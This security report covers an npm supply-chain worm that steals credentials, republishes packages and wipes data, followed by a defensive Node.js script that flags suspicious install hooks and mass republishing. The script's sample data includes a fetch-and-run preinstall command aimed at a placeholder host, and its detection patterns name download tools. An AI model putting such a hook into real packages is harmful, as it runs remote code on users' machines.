GitLab’s Vulnerability Research team has uncovered a large-scale supply chain attack spreading a destructive malware variant through the npm ecosystem.
The malware, an evolved version of “Shai-Hulud,” contains a dangerous feature that threatens to destroy user data if attackers lose control of their infrastructure. The malware spreads through infected npm packages using a multi-stage process.
When developers install a compromised package, a script automatically downloads what appears to be a legitimate version of the Bun JavaScript runtime. However, this is a disguise for the malware’s actual payload. This heavily obfuscated 10MB file executes on the victim’s system.
Figure: Affected npm Packages
Once running, the malware aggressively harvests credentials from multiple sources, including GitHub tokens, npm authentication keys, and accounts for AWS, Google Cloud, and Microsoft Azure.
It even downloads Trufflehog, a legitimate security tool, to scan the entire home directory for hidden API keys and passwords stored in configuration files.

Using stolen npm tokens, the malware automatically infects all other packages maintained by the victim.
It modifies the package.json files to include malicious scripts, increments version numbers, and republishes everything to npm.
This worm-like behavior means the attack spreads exponentially across the ecosystem. The stolen credentials are exfiltrated to attacker-controlled GitHub repositories marked with “Sha1-Hulud: The Second Coming.”
These repositories create a resilient botnet-like network in which compromised systems share access tokens.
Most critically, the malware includes a destructive payload designed to protect the attack’s infrastructure. If an infected system simultaneously loses access to both GitHub and npm, it triggers immediate data destruction.
On Windows systems, the malware attempts to delete all user files and overwrite disk sectors. On Linux and Mac systems, it uses advanced wiping techniques to make file recovery impossible.
This creates a dangerous scenario: if GitHub removes malicious repositories or npm revokes compromised tokens, thousands of infected systems could simultaneously destroy user data across the internet.
GitLab recommends enabling Dependency Scanning in your projects so that compromised packages are detected automatically before they reach production.
Security teams should also monitor for suspicious npm preinstall scripts and unusual version increments in their dependencies.
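The two signals above (a newly added install-time script arriving together with a version bump, and the same change landing across every package one maintainer controls) can be checked mechanically when a dependency update is reviewed. The following Node.js script is an added example, not GitLab's or npm's own code: it compares a dependency's previously reviewed package.json with the newly published one, reports each install-time lifecycle hook with a severity, and raises a separate flag when several packages from one maintainer show the same bump-plus-new-hook signature. The manifests, the `example-*` package names, the `example.invalid` URL and the keyword heuristics are all constructed for illustration and should be tuned for a real environment.

```javascript
// Added example (not GitLab's or npm's own code). Compares a dependency's
// previously reviewed package.json with a newly published one and flags the
// pattern described in the report: a version bump that arrives together with
// a newly added install-time script, and that same pattern across many
// packages of one maintainer. All manifests and heuristics are constructed.

// Lifecycle scripts that npm runs automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Hypothetical heuristics for hooks that fetch or run a foreign binary (the
// report describes a download posing as the Bun runtime); tune for your setup.
const SUSPICIOUS = [/\bcurl\b/i, /\bwget\b/i, /https?:\/\//i, /\bchmod\b/i, /\bbun\b/i, /\bbase64\b/i];

function parseSemver(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(String(v || ''));
  return m ? m.slice(1).map(Number) : null;
}

function compareSemver(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Returns one finding per install-time hook present in `current`.
// `previous` is the manifest at the last reviewed version (may be null).
function auditUpdate(previous, current) {
  const findings = [];
  const prevScripts = (previous && previous.scripts) || {};
  const curScripts = current.scripts || {};
  const prevV = parseSemver(previous && previous.version);
  const curV = parseSemver(current.version);
  const versionBumped = Boolean(prevV && curV && compareSemver(curV, prevV) > 0);

  for (const hook of INSTALL_HOOKS) {
    if (!(hook in curScripts)) continue;
    const script = String(curScripts[hook]);
    // "added" covers both a brand-new hook and a rewritten existing one.
    const added = !(hook in prevScripts) || prevScripts[hook] !== script;
    const matches = SUSPICIOUS.filter((re) => re.test(script)).map((re) => re.source);
    let severity = 'low';                                            // long-standing, plain hook
    if (added) severity = 'medium';                                  // hook appeared or changed
    if (matches.length || (added && versionBumped)) severity = 'high'; // the worm's signature
    findings.push({ package: current.name, version: current.version, hook, script, added, versionBumped, matches, severity });
  }
  return findings;
}

// The worm republishes every package its victim maintains, so the same
// bump-plus-new-hook signature across several packages is a stronger signal.
function auditMaintainerSet(pairs, threshold = 3) {
  const findings = pairs.flatMap(({ previous, current }) => auditUpdate(previous, current));
  const affected = [...new Set(findings.filter((f) => f.added && f.versionBumped).map((f) => f.package))];
  return { findings, affected, massRepublish: affected.length >= threshold };
}

// Constructed sample data: three packages from one hypothetical maintainer,
// each republished with a patch bump and a new preinstall hook, plus one
// untouched package with a long-standing, harmless postinstall.
function sampleMaintainerSet() {
  const hook = 'curl -sL https://example.invalid/runtime -o ./rt && chmod +x ./rt && ./rt';
  const pair = (name, from, to) => ({
    previous: { name, version: from, scripts: { test: 'jest' } },
    current: { name, version: to, scripts: { test: 'jest', preinstall: hook } },
  });
  return [
    pair('example-widget', '2.4.1', '2.4.2'),
    pair('example-parser', '0.9.0', '0.9.1'),
    pair('example-cli', '5.1.3', '5.1.4'),
    {
      previous: { name: 'example-native', version: '1.0.0', scripts: { postinstall: 'node-gyp rebuild' } },
      current: { name: 'example-native', version: '1.0.0', scripts: { postinstall: 'node-gyp rebuild' } },
    },
  ];
}

function printReport(pairs) {
  const report = auditMaintainerSet(pairs);
  for (const f of report.findings) {
    console.log(`${f.severity.toUpperCase()} ${f.package}@${f.version} ${f.hook}: ${f.script}`);
  }
  console.log('mass republish:', report.massRepublish, report.affected);
  return report;
}

printReport(sampleMaintainerSet());
```

In practice the `previous` manifest would come from the lockfile or registry tarball at the last reviewed version and `current` from the candidate update, so the check runs in CI before the new version is installed; a `high` finding or a `massRepublish` flag blocks the update for manual review rather than just logging.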
